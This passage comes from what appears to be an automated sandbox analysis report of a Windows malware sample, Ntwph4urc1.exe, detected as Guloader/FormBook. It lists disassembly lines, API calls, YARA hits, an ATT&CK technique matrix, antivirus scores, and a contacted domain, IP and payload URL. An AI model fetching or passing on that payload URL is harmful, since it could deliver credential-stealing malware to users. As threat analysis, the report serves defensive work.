      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369BD0C0 mov eax, dword ptr fs:[00000030h]6_2_369BD0C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369650E4 mov eax, dword ptr fs:[00000030h]6_2_369650E4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369650E4 mov ecx, dword ptr fs:[00000030h]6_2_369650E4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A150D9 mov eax, dword ptr fs:[00000030h]6_2_36A150D9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0903E mov eax, dword ptr fs:[00000030h]6_2_36A0903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0903E mov eax, dword ptr fs:[00000030h]6_2_36A0903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0903E mov eax, dword ptr fs:[00000030h]6_2_36A0903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0903E mov eax, dword ptr fs:[00000030h]6_2_36A0903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E705E mov ebx, dword ptr fs:[00000030h]6_2_369E705E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E705E mov eax, dword ptr fs:[00000030h]6_2_369E705E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15060 mov eax, dword ptr fs:[00000030h]6_2_36A15060
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B052 mov eax, dword ptr fs:[00000030h]6_2_3696B052
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov ecx, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369BD070 mov ecx, dword ptr fs:[00000030h]6_2_369BD070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C106E mov eax, dword ptr fs:[00000030h]6_2_369C106E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36997190 mov eax, dword ptr fs:[00000030h]6_2_36997190
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F5180 mov eax, dword ptr fs:[00000030h]6_2_369F5180
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F5180 mov eax, dword ptr fs:[00000030h]6_2_369F5180
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695B1B0 mov eax, dword ptr fs:[00000030h]6_2_3695B1B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F11A4 mov eax, dword ptr fs:[00000030h]6_2_369F11A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F11A4 mov eax, dword ptr fs:[00000030h]6_2_369F11A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F11A4 mov eax, dword ptr fs:[00000030h]6_2_369F11A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F11A4 mov eax, dword ptr fs:[00000030h]6_2_369F11A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A131E1 mov eax, dword ptr fs:[00000030h]6_2_36A131E1
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697D1D0 mov eax, dword ptr fs:[00000030h]6_2_3697D1D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697D1D0 mov ecx, dword ptr fs:[00000030h]6_2_3697D1D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E71F9 mov esi, dword ptr fs:[00000030h]6_2_369E71F9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A151CB mov eax, dword ptr fs:[00000030h]6_2_36A151CB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369451ED mov eax, dword ptr fs:[00000030h]6_2_369451ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A17120 mov eax, dword ptr fs:[00000030h]6_2_36A17120
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941131 mov eax, dword ptr fs:[00000030h]6_2_36941131
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941131 mov eax, dword ptr fs:[00000030h]6_2_36941131
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B136 mov eax, dword ptr fs:[00000030h]6_2_3693B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B136 mov eax, dword ptr fs:[00000030h]6_2_3693B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B136 mov eax, dword ptr fs:[00000030h]6_2_3693B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B136 mov eax, dword ptr fs:[00000030h]6_2_3693B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947152 mov eax, dword ptr fs:[00000030h]6_2_36947152
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939148 mov eax, dword ptr fs:[00000030h]6_2_36939148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939148 mov eax, dword ptr fs:[00000030h]6_2_36939148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939148 mov eax, dword ptr fs:[00000030h]6_2_36939148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939148 mov eax, dword ptr fs:[00000030h]6_2_36939148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D3140 mov eax, dword ptr fs:[00000030h]6_2_369D3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D3140 mov eax, dword ptr fs:[00000030h]6_2_369D3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D3140 mov eax, dword ptr fs:[00000030h]6_2_369D3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D9179 mov eax, dword ptr fs:[00000030h]6_2_369D9179
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15152 mov eax, dword ptr fs:[00000030h]6_2_36A15152
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947E96 mov eax, dword ptr fs:[00000030h]6_2_36947E96
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CDE9B mov eax, dword ptr fs:[00000030h]6_2_369CDE9B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36973E8F mov eax, dword ptr fs:[00000030h]6_2_36973E8F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov eax, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov ecx, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov eax, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov eax, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov eax, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FDEB0 mov eax, dword ptr fs:[00000030h]6_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693FEA0 mov eax, dword ptr fs:[00000030h]6_2_3693FEA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693DEA5 mov eax, dword ptr fs:[00000030h]6_2_3693DEA5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693DEA5 mov ecx, dword ptr fs:[00000030h]6_2_3693DEA5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CDEAA mov eax, dword ptr fs:[00000030h]6_2_369CDEAA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F9EDF mov eax, dword ptr fs:[00000030h]6_2_369F9EDF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F9EDF mov eax, dword ptr fs:[00000030h]6_2_369F9EDF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A0BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A0BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A0BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A0BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693BEC0 mov eax, dword ptr fs:[00000030h]6_2_3693BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693BEC0 mov eax, dword ptr fs:[00000030h]6_2_3693BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]6_2_36955EC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696FEC0 mov eax, dword ptr fs:[00000030h]6_2_3696FEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CFEC5 mov eax, dword ptr fs:[00000030h]6_2_369CFEC5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36943EF4 mov eax, dword ptr fs:[00000030h]6_2_36943EF4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36943EF4 mov eax, dword ptr fs:[00000030h]6_2_36943EF4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36943EF4 mov eax, dword ptr fs:[00000030h]6_2_36943EF4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36943EE1 mov eax, dword ptr fs:[00000030h]6_2_36943EE1
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36973EEB mov ecx, dword ptr fs:[00000030h]6_2_36973EEB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36973EEB mov eax, dword ptr fs:[00000030h]6_2_36973EEB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36973EEB mov eax, dword ptr fs:[00000030h]6_2_36973EEB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697BE17 mov eax, dword ptr fs:[00000030h]6_2_3697BE17
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693DE10 mov eax, dword ptr fs:[00000030h]6_2_3693DE10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15E37 mov eax, dword ptr fs:[00000030h]6_2_36A15E37
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15E37 mov eax, dword ptr fs:[00000030h]6_2_36A15E37
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15E37 mov eax, dword ptr fs:[00000030h]6_2_36A15E37
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941E30 mov eax, dword ptr fs:[00000030h]6_2_36941E30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941E30 mov eax, dword ptr fs:[00000030h]6_2_36941E30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A13E10 mov eax, dword ptr fs:[00000030h]6_2_36A13E10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A13E10 mov eax, dword ptr fs:[00000030h]6_2_36A13E10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695DE2D mov eax, dword ptr fs:[00000030h]6_2_3695DE2D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695DE2D mov eax, dword ptr fs:[00000030h]6_2_3695DE2D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695DE2D mov eax, dword ptr fs:[00000030h]6_2_3695DE2D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697BE51 mov eax, dword ptr fs:[00000030h]6_2_3697BE51
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697BE51 mov eax, dword ptr fs:[00000030h]6_2_3697BE51
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E9E56 mov ecx, dword ptr fs:[00000030h]6_2_369E9E56
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36955E40 mov eax, dword ptr fs:[00000030h]6_2_36955E40
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FDE46 mov eax, dword ptr fs:[00000030h]6_2_369FDE46
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693BE78 mov ecx, dword ptr fs:[00000030h]6_2_3693BE78
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693FF90 mov edi, dword ptr fs:[00000030h]6_2_3693FF90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov eax, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov eax, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov eax, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951F92 mov eax, dword ptr fs:[00000030h]6_2_36951F92
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E3F90 mov eax, dword ptr fs:[00000030h]6_2_369E3F90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E3F90 mov eax, dword ptr fs:[00000030h]6_2_369E3F90
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping211
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading      		11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading      		11
      Process Injection      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Ntwph4urc1.exe74%ReversingLabsWin32.Trojan.Guloader
      Ntwph4urc1.exe75%VirustotalBrowse
      Ntwph4urc1.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://babalharra.com.au/0%Avira URL Cloudsafe
      https://babalharra.com.au/yzSJO174.binK0%Avira URL Cloudsafe
      https://babalharra.com.au/ES0%Avira URL Cloudsafe
      https://babalharra.com.au/yzSJO174.bin0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      babalharra.com.au
      		122.201.127.17
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://babalharra.com.au/yzSJO174.binfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
